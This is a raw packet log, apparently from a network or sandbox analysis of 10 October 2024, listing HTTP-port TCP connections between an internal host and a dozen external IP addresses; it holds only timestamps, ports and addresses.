                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143418074 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143513918 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143621922 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.143646955 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.149029970 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:37.149566889 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521459103 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521652937 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521714926 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.521778107 CEST5003180192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.526798010 CEST805003113.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.746541023 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.751569986 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753170967 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753678083 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.753776073 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.758646965 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:38.758660078 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636487961 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636509895 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636575937 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.636667013 CEST5003280192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.641489029 CEST805003234.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.941040993 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.945885897 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.945964098 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946084023 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.946098089 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.951411963 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:39.951726913 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.302709103 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.302900076 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.303262949 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.303344965 CEST5003380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.307697058 CEST805003347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:41.524203062 CEST5003480192.168.2.513.251.16.150
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 10, 2024 10:08:41.529119968 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:41.529196024 CEST | 50034 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:41.529721022 CEST | 50034 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:41.529752970 CEST | 50034 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:41.534586906 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:41.534616947 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:42.906094074 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:42.906265020 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:42.906939030 CEST | 50034 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:42.907031059 CEST | 50034 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:42.911807060 CEST | 80 | 50034 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:43.240658998 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.245825052 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:43.246237993 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.246237993 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.246908903 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.251266956 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:43.251813889 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:43.830950022 CEST | 80 | 50018 | 82.112.184.197 | 192.168.2.5
Oct 10, 2024 10:08:43.831084967 CEST | 50018 | 80 | 192.168.2.5 | 82.112.184.197
Oct 10, 2024 10:08:43.831172943 CEST | 50018 | 80 | 192.168.2.5 | 82.112.184.197
Oct 10, 2024 10:08:43.836327076 CEST | 80 | 50018 | 82.112.184.197 | 192.168.2.5
Oct 10, 2024 10:08:43.900268078 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:43.905252934 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:43.906078100 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:43.906249046 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:43.906280994 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:43.911093950 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:43.911163092 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:43.971321106 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:43.971453905 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:43.971550941 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.971637011 CEST | 50035 | 80 | 192.168.2.5 | 34.211.97.45
Oct 10, 2024 10:08:43.976557016 CEST | 80 | 50035 | 34.211.97.45 | 192.168.2.5
Oct 10, 2024 10:08:44.251511097 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.256504059 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:44.256589890 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.270044088 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.270076990 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.275038958 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:44.275057077 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:44.742204905 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:44.742577076 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:44.742635012 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.743071079 CEST | 50037 | 80 | 192.168.2.5 | 3.94.10.34
Oct 10, 2024 10:08:44.747975111 CEST | 80 | 50037 | 3.94.10.34 | 192.168.2.5
Oct 10, 2024 10:08:45.155745029 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.160703897 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.160840034 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.161293983 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.161312103 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.167699099 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.167707920 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.269949913 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:45.270081043 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:45.270112991 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:45.270164013 CEST | 50036 | 80 | 192.168.2.5 | 47.129.31.212
Oct 10, 2024 10:08:45.275671959 CEST | 80 | 50036 | 47.129.31.212 | 192.168.2.5
Oct 10, 2024 10:08:45.308892965 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:45.313693047 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:45.313759089 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:45.313863993 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:45.313888073 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:45.318681955 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:45.318691015 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:45.638771057 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.638784885 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.638848066 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.638961077 CEST | 50038 | 80 | 192.168.2.5 | 44.213.104.86
Oct 10, 2024 10:08:45.644077063 CEST | 80 | 50038 | 44.213.104.86 | 192.168.2.5
Oct 10, 2024 10:08:45.800606012 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:45.805453062 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:45.805507898 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:45.805876970 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:45.805902958 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:45.810689926 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:45.810700893 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:46.574239016 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:46.574301958 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:46.574450970 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:46.574825048 CEST | 50040 | 80 | 192.168.2.5 | 3.254.94.185
Oct 10, 2024 10:08:46.579277992 CEST | 80 | 50040 | 3.254.94.185 | 192.168.2.5
Oct 10, 2024 10:08:46.708317995 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:46.708384991 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:46.708435059 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:46.708528042 CEST | 50039 | 80 | 192.168.2.5 | 13.251.16.150
Oct 10, 2024 10:08:46.713284969 CEST | 80 | 50039 | 13.251.16.150 | 192.168.2.5
Oct 10, 2024 10:08:46.948019981 CEST | 50041 | 80 | 192.168.2.5 | 44.221.84.105
Oct 10, 2024 10:08:46.952917099 CEST | 80 | 50041 | 44.221.84.105 | 192.168.2.5
Oct 10, 2024 10:08:46.953078032 CEST | 50041 | 80 | 192.168.2.5 | 44.221.84.105
Oct 10, 2024 10:08:46.953394890 CEST | 50041 | 80 | 192.168.2.5 | 44.221.84.105
Oct 10, 2024 10:08:46.953394890 CEST | 50041 | 80 | 192.168.2.5 | 44.221.84.105
Oct 10, 2024 10:08:46.958250046 CEST | 80 | 50041 | 44.221.84.105 | 192.168.2.5
Oct 10, 2024 10:08:46.958261013 CEST | 80 | 50041 | 44.221.84.105 | 192.168.2.5
Oct 10, 2024 10:08:47.100965977 CEST | 50042 | 80 | 192.168.2.5 | 85.214.228.140
Oct 10, 2024 10:08:47.105777979 CEST | 80 | 50042 | 85.214.228.140 | 192.168.2.5
Oct 10, 2024 10:08:47.105863094 CEST | 50042 | 80 | 192.168.2.5 | 85.214.228.140
Oct 10, 2024 10:08:47.105982065 CEST | 50042 | 80 | 192.168.2.5 | 85.214.228.140
Oct 10, 2024 10:08:47.106024981 CEST | 50042 | 80 | 192.168.2.5 | 85.214.228.140
Oct 10, 2024 10:08:47.110814095 CEST | 80 | 50042 | 85.214.228.140 | 192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.110821962 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469376087 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469496965 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469517946 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.469536066 CEST5004180192.168.2.544.221.84.105
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.474309921 CEST805004144.221.84.105192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.681694984 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.686631918 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.686775923 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.689661026 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.694530010 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.694677114 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.731312990 CEST805004285.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:47.773623943 CEST5004280192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.153489113 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158416986 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158507109 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158731937 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.158773899 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.163592100 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:48.163616896 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.016828060 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.016983032 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.017041922 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.017041922 CEST5004380192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.022082090 CEST805004318.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.063186884 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068008900 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068063021 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068244934 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.068264008 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.073064089 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.073074102 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.497000933 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.498286963 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.498331070 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.500571966 CEST5004480192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.505395889 CEST805004447.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.551740885 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.551800966 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.553591013 CEST5004580192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.558593035 CEST8050045172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.592588902 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598108053 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598215103 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598443031 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.598459959 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.603630066 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.603640079 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.687587023 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.692579985 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696106911 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696213007 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.696228981 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.701101065 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:49.701119900 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.081779003 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.081970930 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.082851887 CEST5004680192.168.2.5172.234.222.138
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.087698936 CEST8050046172.234.222.138192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.132436991 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.137557030 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.137847900 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.148199081 CEST5004880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.153228998 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.153244019 CEST805004834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428208113 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428278923 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.428759098 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.542330980 CEST5004780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.547208071 CEST805004734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.871611118 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876507044 CEST805004947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:50.876657009 CEST5004980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.894362926 CEST805005735.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.983011961 CEST805005513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.983025074 CEST805005513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.983104944 CEST5005580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.983222008 CEST5005580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:54.987970114 CEST805005513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.474071026 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479336023 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479427099 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479811907 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.479823112 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.484616041 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.484625101 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.617454052 CEST805005735.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.617650986 CEST805005735.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.617711067 CEST5005780192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.631613970 CEST5005780192.168.2.535.164.78.200
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.636462927 CEST805005735.164.78.200192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.646064043 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.650955915 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.651407957 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.651859045 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.651859045 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.656676054 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:55.656688929 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.126544952 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.126837015 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.127414942 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.132292032 CEST5005980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.137301922 CEST80500593.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.151488066 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156475067 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156537056 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156876087 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.156898022 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.161698103 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.161724091 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.247562885 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.249552965 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.249700069 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.252464056 CEST5005880192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.257209063 CEST805005834.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.586373091 CEST5006180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.591742039 CEST805006118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.591897011 CEST5006180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.592171907 CEST5006180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.592197895 CEST5006180192.168.2.518.141.10.107
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.597007990 CEST805006118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.597053051 CEST805006118.141.10.107192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.767970085 CEST8050060165.160.13.20192.168.2.5
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.770220995 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.770277977 CEST5006080192.168.2.5165.160.13.20
                                                                                                                                                                                                                                                                                                          Oct 10, 2024 10:08:56.775175095 CEST8050060165.160.13.20192.168.2.5
